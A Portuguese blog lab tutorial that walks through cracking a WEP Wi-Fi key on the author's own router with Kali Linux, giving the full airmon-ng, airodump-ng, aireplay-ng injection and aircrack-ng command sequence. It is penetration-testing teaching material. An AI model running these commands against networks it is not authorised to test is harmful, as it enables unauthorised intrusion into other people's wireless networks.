quinta-feira, 16 de abril de 2015

Laboratório: Quebrando uma Chave WEP - Invadindo uma Rede Sem Fio

Laboratório TéchneDigitus
Pen Test 01: Quebrando uma Chave WEP
Tipo: Invadindo Redes Wifi


Pré-Requisitos:

Em uma máquina virtual, executar a distribuição LIVE do Kali Linux.
Material Utilizado para Este Lab:

Hardware:
- Notebook (ex.: Processador I5, RAM: 16GB)
- Roteador Wifi (ex.: RE024 da Multilaser)
- Interface de Rede USB (ex.: DWA-125 da D-Link)

Software:
- Sistema Operacional do Notebook: Windows 8.1
- Software de Virtualização: VMware Workstation 11
- Sistema Operacional Virtualizado: Kali Linux 1.1.0 versão Live

Foto do material utilizado neste lab

Procedimento Preparatório:

(considerando que o VMware já está instalado, a ISO do Kali já está disponível no HD do Notebook e no roteador já existe uma rede wifi com chave WEP configurada)
a) Abrir o VMware e criar uma máquina virtual para subir a versão Live do Kali, com 1 Processador, 2 Núcleos, 5 GB de RAM.
b) Plugar a interface de rede wifi usb
c) Inicializar o Kali

Vamos ao Lab...

Laboratório: Quebrando uma Chave WEP

1) Abra o terminal e dê um ifconfig. Verifique a sua interface USB foi encontrada pelo Kali.

Passo 1 - Imagem
2) Digite: airmon-ng start wlan0 //Se a sua interface de rede estiver com outro nome, digite-o no lugar de wlan0.

Passo 2 - Imagem

3) No meu exemplo, o output informou que existem 3 processos 3672, 4168 e 4493 que podem atrapalhar o lab. Sendo assim, utilizando os comandos kill 3672, kill 4168 e kill 4493, derrubamos os processos desejados. (Note também que o processo 4493 devia estar amarrado a um dos outros dois processos. Quando matei-os, matei o terceiro junto.)

Passo 3 - Imagem
4) Digite agora airodump-ng -i mon0 e anote o número do canal e, o MAC do AP.

Passo 4 - Imagem
5) Digite agora: airodump-ng --ivs -w dados --channel 13 --bssid C8:3A:35:09:D7:28 mon0

Neste momento, o Kali está coletando e salvando em um arquivo dados-01.ivs, os dados necessários para rodar o algoritmo de quebra da WEP.

Para que ele faça a coleta de dados é necessário que pacotes dessa rede wifi alvo estejam transitando pela rede. Isto é, a rede precisa estar em utilização.

Passo 5 - Imagem

Passo 6) Gerar tráfego para coletar dados...

Formas de Gerar Tráfego:

- Em meu caso, conectei a placa a interface WAN do meu AP num cabo com Internet e conectei outro PC na rede Wifi do Lab para navegar na internet e gerar dados para a coleta. Mas essa forma só é possível devido a nós sermos detentores dos equipamentos nos quais estamos testando.

(A) - Abra um novo terminal e digite aireplay-ng -1 0 -e TechneDigitus_Lab -a C8:3A:35:09:D7:28 -h 00:26:5A:6F:9E:CC mon0

Atenção, substituir:

TechneDigitus_Lab - Pelo SSID (nome da rede wifih) da rede que você está tentando invadir
C8:3A:35:09:D7:28 - Pelo endereço MAC do AP que você está tentando invadir
00:26:5A:6F:9E:CC - Pelo endereço MAC da sua placa de rede usb

Passo 6 - A - Imagem
(B) - Agora digite aireplay-ng -3 -b C8:3A:35:09:D7:28 -h 00:26:5A:6F:9E:CC mon0 e deixe rodando até que você, na outra tela de terminal, consiga obter a chave WEB conforme o próximo passo.

Atenção, substituir:

C8:3A:35:09:D7:28 - Pelo MAC do AP que está tentando invadir
00:26:5A:6F:9E:CC - Pelo MAC da sua placa de rede usb


Passo 6 - B - Imagem
7) Até este momento, devemos ter chego até este passo com 2 janelas de terminais abertas e coma um comando rodando. Uma para o comando do passo 5 e outra para o comando do passo 6B.
Agora, para o passo 7, abriremos uma nova janela de terminal e digitaremos primeiro ls para confirmar o nome do arquivo onde estão sendo gravados os dados capturados pelo passo 5. E, por fim:
aircrack-ng -a 1 dados-01.ivs

Passo 7 - Imagem
E pronto! Conforme podemos ver na imagem, a chave WEP foi descriptografada corretamente e a senha era: [email protected]


Para saber mais: